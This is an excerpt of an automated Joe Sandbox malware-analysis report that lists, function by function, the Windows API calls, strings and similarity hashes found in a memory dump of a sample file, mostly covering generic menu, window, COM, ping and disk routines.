                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: BuffCharDriveLowerType_wcscpy
                                                  • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                  • API String ID: 2820617543-1000479233
                                                  • Opcode ID: 1ed65c2609cb1e7952fb6176a3e1af1d3621063b853d9617dd703478ee2cd04b
                                                  • Instruction ID: 2064fdbc664a161ad639cd5423109ba715aaa6dc6ebbaf471c26d5e4ff4fa381
                                                  • Opcode Fuzzy Hash: 1ed65c2609cb1e7952fb6176a3e1af1d3621063b853d9617dd703478ee2cd04b
                                                  • Instruction Fuzzy Hash: 2651EB35108301AFC700EF25C892AAFB7E5EF81705F10496DF9A6572A2DB309A8DDA53
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: __i64tow__itow__swprintf
                                                  • String ID: %.15g$0x%p$False$True
                                                  • API String ID: 421087845-2263619337
                                                  • Opcode ID: 8530dca27ebd6173c9eb6b94a4971f26c7d998d917d128724faa282e9692cf92
                                                  • Instruction ID: 69f57437f4ab8f35c9d79bd56fc8bfe235dd2897921ed47a51e4cab85ac9e7ed
                                                  • Opcode Fuzzy Hash: 8530dca27ebd6173c9eb6b94a4971f26c7d998d917d128724faa282e9692cf92
                                                  • Instruction Fuzzy Hash: 9441D77150020D9FDB24DF74E841E7677F8FF06344F2044BEE549D7291EA719A469710
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C7716A
                                                  • CreateMenu.USER32 ref: 00C77185
                                                  • SetMenu.USER32(?,00000000), ref: 00C77194
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C77221
                                                  • IsMenu.USER32(?), ref: 00C77237
                                                  • CreatePopupMenu.USER32 ref: 00C77241
                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C7726E
                                                  • DrawMenuBar.USER32 ref: 00C77276
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                  • String ID: 0$F
                                                  • API String ID: 176399719-3044882817
                                                  • Opcode ID: 822b8fec298fc6d456c1ad35b19104caea8e72ceb3b1f25a7d337884614df3c5
                                                  • Instruction ID: 309960a47bcca23b8f431cfe3d94f338c6954bb7afc157eacd7f0695e5abb40b
                                                  • Opcode Fuzzy Hash: 822b8fec298fc6d456c1ad35b19104caea8e72ceb3b1f25a7d337884614df3c5
                                                  • Instruction Fuzzy Hash: AD415875A01209EFDB20DFA5D884F9A7BB5FF49310F144128F929A7361D731AA10CFA0
                                                  APIs
                                                  • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 00C7755E
                                                  • CreateCompatibleDC.GDI32(00000000), ref: 00C77565
                                                  • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00C77578
                                                  • SelectObject.GDI32(00000000,00000000), ref: 00C77580
                                                  • GetPixel.GDI32(00000000,00000000,00000000), ref: 00C7758B
                                                  • DeleteDC.GDI32(00000000), ref: 00C77594
                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00C7759E
                                                  • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 00C775B2
                                                  • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 00C775BE
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                  • String ID: static
                                                  • API String ID: 2559357485-2160076837
                                                  • Opcode ID: 4f70e2e9779f849b44979e3a5b849d469f02e85aca8936374aced9b16c79ef33
                                                  • Instruction ID: e97f1dc006d5553e43cd4f2a62f6ec605154acd31f3dafe231b2018aa6a4831f
                                                  • Opcode Fuzzy Hash: 4f70e2e9779f849b44979e3a5b849d469f02e85aca8936374aced9b16c79ef33
                                                  • Instruction Fuzzy Hash: C1316D72104219BBDF119F64DC48FDE3B69FF09360F114329FA29A61A0C731D962DBA4
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C16E3E
                                                    • Part of subcall function 00C18B28: __getptd_noexit.LIBCMT ref: 00C18B28
                                                  • __gmtime64_s.LIBCMT ref: 00C16ED7
                                                  • __gmtime64_s.LIBCMT ref: 00C16F0D
                                                  • __gmtime64_s.LIBCMT ref: 00C16F2A
                                                  • __allrem.LIBCMT ref: 00C16F80
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C16F9C
                                                  • __allrem.LIBCMT ref: 00C16FB3
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C16FD1
                                                  • __allrem.LIBCMT ref: 00C16FE8
                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00C17006
                                                  • __invoke_watson.LIBCMT ref: 00C17077
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                  • String ID:
                                                  • API String ID: 384356119-0
                                                  • Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction ID: d30e981a80bc1a00287c6011e29d3de151bfd206603f42b18f519c60f7f678c1
                                                  • Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
                                                  • Instruction Fuzzy Hash: 3C710876A00716ABD714EF69DC41BDAB3B4AF06324F148239F424D7681E770DE81AB90
                                                  APIs
                                                  • _memset.LIBCMT ref: 00C52542
                                                  • GetMenuItemInfoW.USER32(00CB5890,000000FF,00000000,00000030), ref: 00C525A3
                                                  • SetMenuItemInfoW.USER32(00CB5890,00000004,00000000,00000030), ref: 00C525D9
                                                  • Sleep.KERNEL32(000001F4), ref: 00C525EB
                                                  • GetMenuItemCount.USER32(?), ref: 00C5262F
                                                  • GetMenuItemID.USER32(?,00000000), ref: 00C5264B
                                                  • GetMenuItemID.USER32(?,-00000001), ref: 00C52675
                                                  • GetMenuItemID.USER32(?,?), ref: 00C526BA
                                                  • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00C52700
                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52714
                                                  • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C52735
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                  • String ID:
                                                  • API String ID: 4176008265-0
                                                  • Opcode ID: 22f86e8a3385f6d8ca60ce381b008e7f932347828f000668ba7e69ffb66d5910
                                                  • Instruction ID: bfb0a55e889cd59fac793816afdfe7232805381da974a3ef72aac4f442d5a2c8
                                                  • Opcode Fuzzy Hash: 22f86e8a3385f6d8ca60ce381b008e7f932347828f000668ba7e69ffb66d5910
                                                  • Instruction Fuzzy Hash: 7E619D78900249AFDB11CF64CC88EBE7BF8EB06346F540159FC51A3251DB31AE8ADB25
                                                  APIs
                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00C76FA5
                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00C76FA8
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00C76FCC
                                                  • _memset.LIBCMT ref: 00C76FDD
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00C76FEF
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00C77067
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$LongWindow_memset
                                                  • String ID:
                                                  • API String ID: 830647256-0
                                                  • Opcode ID: e82ec7661387b218c68586397547f757dcc89b4cf40a8377573b919ea5d67a9b
                                                  • Instruction ID: 6b4f2c3c70f0abc27b0d0dad7be3d3a4698c946d1a66f201ad0be24a1fd27c8b
                                                  • Opcode Fuzzy Hash: e82ec7661387b218c68586397547f757dcc89b4cf40a8377573b919ea5d67a9b
                                                  • Instruction Fuzzy Hash: A8613C75A00208AFDB11DFA4CC81FEE77F8EB09710F144199FA19AB2A1D771AE45DB90
                                                  APIs
                                                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00C46BBF
                                                  • SafeArrayAllocData.OLEAUT32(?), ref: 00C46C18
                                                  • VariantInit.OLEAUT32(?), ref: 00C46C2A
                                                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 00C46C4A
                                                  • VariantCopy.OLEAUT32(?,?), ref: 00C46C9D
                                                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 00C46CB1
                                                  • VariantClear.OLEAUT32(?), ref: 00C46CC6
                                                  • SafeArrayDestroyData.OLEAUT32(?), ref: 00C46CD3
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C46CDC
                                                  • VariantClear.OLEAUT32(?), ref: 00C46CEE
                                                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00C46CF9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                  • String ID:
                                                  • API String ID: 2706829360-0
                                                  • Opcode ID: 4e0ad3fd084416aaf4536fc48d6d4405164942f01ba4c0b1ee1fab2b7fab60e8
                                                  • Instruction ID: 57f11c621b854444c76ec7312c31fea34f5687b91a06abefde3e3545c20b8d33
                                                  • Opcode Fuzzy Hash: 4e0ad3fd084416aaf4536fc48d6d4405164942f01ba4c0b1ee1fab2b7fab60e8
                                                  • Instruction Fuzzy Hash: 5A414575A001199FCF14DF64D888AAEBBB9FF09354F008079E955E7261CB30E946DF91
                                                  APIs
                                                    • Part of subcall function 00BF9837: __itow.LIBCMT ref: 00BF9862
                                                    • Part of subcall function 00BF9837: __swprintf.LIBCMT ref: 00BF98AC
                                                  • CoInitialize.OLE32 ref: 00C68403
                                                  • CoUninitialize.OLE32 ref: 00C6840E
                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00C82BEC,?), ref: 00C6846E
                                                  • IIDFromString.OLE32(?,?), ref: 00C684E1
                                                  • VariantInit.OLEAUT32(?), ref: 00C6857B
                                                  • VariantClear.OLEAUT32(?), ref: 00C685DC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                  • API String ID: 834269672-1287834457
                                                  • Opcode ID: 9789a43a60ed314dc609388627ce971ab840698e36ab8285b5fa169218c64bdd
                                                  • Instruction ID: 28354fea9c6bf97f2f01480b8889c82e0c4238b2c61d6c789e31152b9db5b965
                                                  • Opcode Fuzzy Hash: 9789a43a60ed314dc609388627ce971ab840698e36ab8285b5fa169218c64bdd
                                                  • Instruction Fuzzy Hash: 40618D706083129FD720DF55C888F6EB7E8AF49754F004659F9969B291CB70EE88CB92
                                                  APIs
                                                  • WSAStartup.WSOCK32(00000101,?), ref: 00C65793
                                                  • inet_addr.WSOCK32(?,?,?), ref: 00C657D8
                                                  • gethostbyname.WSOCK32(?), ref: 00C657E4
                                                  • IcmpCreateFile.IPHLPAPI ref: 00C657F2
                                                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65862
                                                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00C65878
                                                  • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00C658ED
                                                  • WSACleanup.WSOCK32 ref: 00C658F3
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                  • String ID: Ping
                                                  • API String ID: 1028309954-2246546115
                                                  • Opcode ID: 80b22d96516d207903a59f93f334e125cc468c02f0f7af1939754ebc96940e73
                                                  • Instruction ID: b3dbe6beb3a2d161a1ca4e9ae69476495799a4fde7c580190d50b40f44c6a1d3
                                                  • Opcode Fuzzy Hash: 80b22d96516d207903a59f93f334e125cc468c02f0f7af1939754ebc96940e73
                                                  • Instruction Fuzzy Hash: E4519E316447009FD720DF25CC85B2A77E4EF49720F144569FA6ADB2E1DB30E945DB42
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00C5B4D0
                                                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00C5B546
                                                  • GetLastError.KERNEL32 ref: 00C5B550
                                                  • SetErrorMode.KERNEL32(00000000,READY), ref: 00C5B5BD
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: Error$Mode$DiskFreeLastSpace
                                                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                  • API String ID: 4194297153-14809454
                                                  • Opcode ID: 259cfd74a16f12a6232d5c659068c54908c29b2d2699e64ea3949f8e7a7cead2
                                                  • Instruction ID: 09990f7bba60ed9abdf2f742c49b1472fd015e6e2326352ea82b1c6d40562d8d
                                                  • Opcode Fuzzy Hash: 259cfd74a16f12a6232d5c659068c54908c29b2d2699e64ea3949f8e7a7cead2
                                                  • Instruction Fuzzy Hash: 7F318339A002099FCB04DBA8DC85FBD7BB4FF05316F504165FA1597292EB709E8ACB51
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00C49014
                                                  • GetDlgCtrlID.USER32 ref: 00C4901F
                                                  • GetParent.USER32 ref: 00C4903B
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C4903E
                                                  • GetDlgCtrlID.USER32(?), ref: 00C49047
                                                  • GetParent.USER32(?), ref: 00C49063
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C49066
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: 8534c7a1580e0990304a285964aeb7649eed1471eee8836dfca1561abd14cc46
                                                  • Instruction ID: d3957de742b17356bfff874a4bbf991c4c9b1aac8558d75353b3a54339240308
                                                  • Opcode Fuzzy Hash: 8534c7a1580e0990304a285964aeb7649eed1471eee8836dfca1561abd14cc46
                                                  • Instruction Fuzzy Hash: 9C21D074A00108BFDF04ABA5CC85FFEBBB8FF49310F1041A9BA21972E1DB755959DA20
                                                  APIs
                                                    • Part of subcall function 00BF7DE1: _memmove.LIBCMT ref: 00BF7E22
                                                    • Part of subcall function 00C4AA99: GetClassNameW.USER32(?,?,000000FF), ref: 00C4AABC
                                                  • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00C490FD
                                                  • GetDlgCtrlID.USER32 ref: 00C49108
                                                  • GetParent.USER32 ref: 00C49124
                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 00C49127
                                                  • GetDlgCtrlID.USER32(?), ref: 00C49130
                                                  • GetParent.USER32(?), ref: 00C4914C
                                                  • SendMessageW.USER32(00000000,?,?,00000111), ref: 00C4914F
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                  • String ID: ComboBox$ListBox
                                                  • API String ID: 1536045017-1403004172
                                                  • Opcode ID: db6568c28b3e8d374b19c74e41691d301a14ee820e11338ce5c5f151b4ce45de
                                                  • Instruction ID: 84be92ebd39596748aa4348b94a39a46ebe0de38604c1671f3a7318e525f81c2
                                                  • Opcode Fuzzy Hash: db6568c28b3e8d374b19c74e41691d301a14ee820e11338ce5c5f151b4ce45de
                                                  • Instruction Fuzzy Hash: 6B21F574A40108BFDF10ABA5CC85FFEBBB8FF49310F004069BA25972A1DB754959DB20
                                                  APIs
                                                  • GetParent.USER32 ref: 00C4916F
                                                  • GetClassNameW.USER32(00000000,?,00000100), ref: 00C49184
                                                  • _wcscmp.LIBCMT ref: 00C49196
                                                  • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00C49211
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ClassMessageNameParentSend_wcscmp
                                                  • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                  • API String ID: 1704125052-3381328864
                                                  • Opcode ID: fb486b6a5bb4f75284964b2de76a9b70140d5007d23a4ce5b4ce71e79a250509
                                                  • Instruction ID: f4873bb993920cc32fa56e88d160c98779ea368a7ae22ff23f2903bed0079349
                                                  • Opcode Fuzzy Hash: fb486b6a5bb4f75284964b2de76a9b70140d5007d23a4ce5b4ce71e79a250509
                                                  • Instruction Fuzzy Hash: 75110D3A24831779FB312625DC0BEE737ACFF16724B200126F920A44D1FEB259A16554
                                                  APIs
                                                  • VariantInit.OLEAUT32(?), ref: 00C688D7
                                                  • CoInitialize.OLE32(00000000), ref: 00C68904
                                                  • CoUninitialize.OLE32 ref: 00C6890E
                                                  • GetRunningObjectTable.OLE32(00000000,?), ref: 00C68A0E
                                                  • SetErrorMode.KERNEL32(00000001,00000029), ref: 00C68B3B
                                                  • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00C82C0C), ref: 00C68B6F
                                                  • CoGetObject.OLE32(?,00000000,00C82C0C,?), ref: 00C68B92
                                                  • SetErrorMode.KERNEL32(00000000), ref: 00C68BA5
                                                  • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00C68C25
                                                  • VariantClear.OLEAUT32(?), ref: 00C68C35
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1290109289.0000000000BF1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BF0000, based on PE: true
                                                  • Associated: 00000005.00000002.1290075298.0000000000BF0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000C7F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295627778.0000000000CA4000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1295798374.0000000000CAE000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1296093581.0000000000CB7000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bf0000_25Lz840Dmh.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                  • String ID:
                                                  • API String ID: 2395222682-0
